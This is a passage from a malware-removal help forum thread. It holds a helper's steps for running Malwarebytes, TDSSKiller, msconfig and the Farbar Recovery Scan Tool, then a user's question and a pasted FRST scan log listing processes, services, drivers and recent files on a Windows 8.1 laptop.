      • If you are prompted to reboot, allow it by pressing Yes.
    • Navigate to the program's History tab to retrieve the log.
      • Click Application Logs and double-click on the most recent Scan Log.
      • Export the log to your desktop as a .TXT file.
      • You can also choose to directly copy the log by selecting Copy to Clipboard.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 3

    Download 'TDSSKiller by Kaspersky Lab ZAO' and save it to your desktop.
    • Double-click TDSSKiller.exe to run it. It will ask for administrator privileges.
    • Kindly read and Accept the next two prompts.
    • Click Start Scan to begin the scan.
      • If an infected file is detected, the default action will be Cure, click on Continue.
      • If a suspicious file is detected, the default action will be Skip, click on Continue.
    • It may ask you to reboot the computer to complete the process. If so, click on Reboot Now. If not, click Close.
    • The log will be made available at C:\TDSSKiller.*_*_*_log.txt. Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 4

    Open System Configuration by following the steps below.
    • Press the Windows and R buttons together. The Run prompt should appear.
    • Type in msconfig and press OK.
    • Navigate to the Startup tab > Enable All > Apply > OK.
    • You will be prompted to restart. Do not allow it by choosing Exit without restart.
  • Step 5

    Run your copy of FRST by double-clicking it.
    • Press the Scan button after.
    • It will produce FRST.txt on your desktop once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of this log in your next reply.
  • Logs to Post

    In summary of the above, I will need you to post the following log(s):
    • FRST.txt (Farbar Recovery Scan Tool)
    • fixlog.txt (Farbar Recovery Scan Tool)
    • mbam-log-YYYY-MM-DD (HH-MM-SS).xml (Malwarebytes Anti-Malware)
    • TDSSKiller.*_*_*_log.txt (TDSSKiller)

  • 0

#5
smwifey
Posted 30 July 2015 - 06:27 PM

smwifey

    Member

  • Topic Starter
  • Member
  • PipPip
  • 85 posts

Tried to follow the directions to the letter.  One thing I am confused about is Step 1.  Was I supposed to paste that code into the FRST box before I pressed FIX?

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:30-07-2015
Ran by Richie (administrator) on RICHIE (30-07-2015 20:13:08)
Running from C:\Users\Richie\Desktop
Loaded Profiles: Richie (Available Profiles: Richie)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3030256 2013-05-16] (Synaptics Incorporated)
HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766688 2014-07-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe [134368 2015-06-02] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [782008 2015-07-15] (Avira Operations GmbH & Co. KG)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{406A6EC4-A42A-4564-810E-0501F8EED96A}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{D51C3955-2AF3-49BA-9C94-C3C07B602A4D}: [DhcpNameServer] 192.168.254.254
 
FireFox:
========
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll [2012-04-26] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2012-05-11] ()
 
Chrome: 
=======
CHR Profile: C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-27]
CHR Extension: (Google Docs) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-27]
CHR Extension: (Google Drive) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-27]
CHR Extension: (YouTube) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-27]
CHR Extension: (Google Search) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-27]
CHR Extension: (Google Sheets) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-27]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-27]
CHR Extension: (Gmail) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-27]
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.) [File not signed]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [887128 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1213072 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [217280 2015-06-02] (Avira Operations GmbH & Co. KG)
S3 BthHFSrv; C:\Windows\System32\BthHFSrv.dll [324608 2014-11-21] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2015-07-10] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [113880 2015-07-30] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [266896 2012-06-13] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\System32\drivers\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2012-08-31] (Hewlett-Packard Development Company, L.P.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-30 19:54 - 2015-07-30 19:56 - 04404952 _____ (Kaspersky Lab ZAO) C:\Users\Richie\Desktop\tdsskiller.exe
2015-07-30 17:45 - 2015-07-30 17:45 - 00000000 ____D C:\Users\Richie\Desktop\FRST-OlderVersion
2015-07-29 20:49 - 2015-07-29 20:49 - 00030866 _____ C:\Users\Richie\Desktop\Addition.txt
2015-07-29 20:46 - 2015-07-30 20:13 - 00011546 _____ C:\Users\Richie\Desktop\FRST.txt
2015-07-29 17:42 - 2015-07-30 17:45 - 02168832 _____ (Farbar) C:\Users\Richie\Desktop\FRST64.exe
2015-07-28 19:59 - 2015-07-05 06:08 - 00300704 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2015-07-28 16:37 - 2015-07-28 16:39 - 00036677 _____ C:\Users\Richie\Downloads\Addition.txt
2015-07-28 16:37 - 2015-07-25 09:34 - 01084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-07-28 16:34 - 2015-07-30 20:13 - 00000000 ____D C:\FRST
2015-07-28 16:34 - 2015-07-28 16:39 - 00072365 _____ C:\Users\Richie\Downloads\FRST.txt
2015-07-28 16:30 - 2015-07-28 16:30 - 02146816 _____ (Farbar) C:\Users\Richie\Downloads\FRST64.exe
2015-07-28 16:00 - 2015-07-28 16:00 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Avira
2015-07-28 15:50 - 2015-07-15 08:37 - 00148632 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00137288 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00043576 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys
2015-07-28 15:13 - 2015-07-28 15:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-07-28 15:13 - 2015-07-28 15:13 - 00001132 _____ C:\Users\Public\Desktop\Avira.lnk
2015-07-28 15:12 - 2015-07-28 15:50 - 00000000 ____D C:\Program Files (x86)\Avira
2015-07-28 15:09 - 2015-07-28 16:04 - 00000000 ____D C:\ProgramData\Avira
2015-07-28 15:06 - 2015-07-28 15:08 - 04636584 _____ (Avira Operations GmbH & Co. KG) C:\Users\Richie\Downloads\avira.exe
2015-07-27 21:59 - 2015-07-30 20:12 - 00113880 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-07-27 21:58 - 2015-07-27 21:58 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-07-27 21:03 - 2015-07-27 21:57 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Richie\Downloads\mbam-setup-2.1.8.1057.exe
2015-07-27 20:51 - 2015-07-30 18:21 - 00002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-07-27 20:51 - 2015-07-27 20:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-07-27 20:40 - 2015-07-30 19:55 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-27 20:40 - 2015-07-30 19:52 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-27 20:40 - 2015-07-27 21:50 - 00003892 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-07-27 20:40 - 2015-07-27 21:50 - 00003656 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-27 20:40 - 2015-07-27 20:50 - 00000000 ____D C:\Program Files (x86)\Google
2015-07-27 20:39 - 2015-07-27 20:51 - 00000000 ____D C:\Users\Richie\AppData\Local\Google
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Deployment
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Apps\2.0
2015-07-27 08:00 - 2015-07-27 08:00 - 00000000 ____D C:\Program Files\Common Files\AV
2015-07-24 13:07 - 2015-07-14 10:14 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00301056 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-07-24 13:07 - 2015-07-14 10:13 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-07-24 13:07 - 2015-05-25 09:23 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-07-24 13:07 - 2015-05-25 09:07 - 01430528 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-07-22 19:34 - 2015-07-22 19:34 - 00000000 ____D C:\Users\Richie\AppData\Local\GWX
2015-07-20 08:25 - 2015-07-20 08:25 - 00000000 ____D C:\ProgramData\ATI
2015-07-20 08:00 - 2015-07-25 08:15 - 00000000 ___SD C:\WINDOWS\system32\GWX
2015-07-20 08:00 - 2015-07-20 08:00 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX
2015-07-17 09:52 - 2015-07-17 09:52 - 00060601 _____ C:\WINDOWS\SysWOW64\CCCInstall_201507170952212808.log
2015-07-17 09:51 - 2015-07-17 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-07-17 09:49 - 2015-07-28 15:13 - 00000000 ____D C:\ProgramData\Package Cache
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2015-07-17 09:45 - 2015-07-17 09:45 - 00000000 ____D C:\AMD
2015-07-17 09:43 - 2015-07-17 09:43 - 00000000 ____D C:\Program Files\AMD
2015-07-17 08:53 - 2015-07-17 08:53 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-07-16 13:18 - 2015-06-15 18:39 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-07-16 13:18 - 2015-06-15 18:38 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 18:26 - 00633856 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-07-16 13:18 - 2015-06-15 18:24 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-07-16 13:18 - 2015-06-15 18:02 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2015-07-16 13:18 - 2015-06-15 17:58 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
2015-07-16 13:18 - 2015-06-15 17:57 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 17:56 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-07-16 13:18 - 2015-06-15 17:55 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 17:49 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 17:41 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-07-16 13:18 - 2015-06-15 17:38 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 17:36 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 17:17 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 17:16 - 02427392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-07-16 13:18 - 2015-06-15 17:15 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-07-16 13:18 - 2015-06-15 17:13 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 17:04 - 00478208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-07-16 13:18 - 2015-06-15 17:03 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-07-16 13:18 - 2015-06-15 16:52 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-07-16 13:18 - 2015-06-15 16:47 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2015-07-16 13:18 - 2015-06-15 16:44 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
2015-07-16 13:18 - 2015-06-15 16:43 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 16:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2015-07-16 13:18 - 2015-06-15 16:41 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 16:37 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 16:32 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2015-07-16 13:18 - 2015-06-15 16:31 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 16:30 - 02052608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 16:30 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2015-07-16 13:18 - 2015-06-15 16:17 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 16:07 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-07-16 13:18 - 2015-06-15 16:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-07-16 13:18 - 2015-05-22 23:14 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-07-16 13:18 - 2015-05-22 23:04 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 15:00 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-07-16 13:18 - 2015-05-22 14:47 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 14:08 - 00374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2015-07-16 13:18 - 2015-04-21 12:13 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
2015-07-16 13:18 - 2015-04-21 11:49 - 00720384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2015-07-16 13:18 - 2015-01-11 22:21 - 00490496 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
2015-07-16 13:18 - 2015-01-11 21:45 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
2015-07-16 12:35 - 2015-07-02 17:21 - 19877376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:50 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:49 - 25193984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:23 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:19 - 12855296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-07-16 12:35 - 2015-07-02 15:55 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-07-16 12:35 - 2015-07-02 15:20 - 14453248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-07-16 12:35 - 2015-07-02 14:59 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-07-16 12:00 - 2015-04-13 18:37 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\authz.dll
2015-07-16 12:00 - 2015-04-13 18:34 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authz.dll
2015-07-16 11:55 - 2015-07-01 18:08 - 05923840 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-07-16 11:55 - 2015-07-01 17:14 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-07-16 11:51 - 2015-02-03 19:58 - 00264000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00114496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00044024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-07-16 11:51 - 2015-02-02 19:53 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2015-07-16 11:51 - 2015-02-02 19:53 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winshfhc.dll
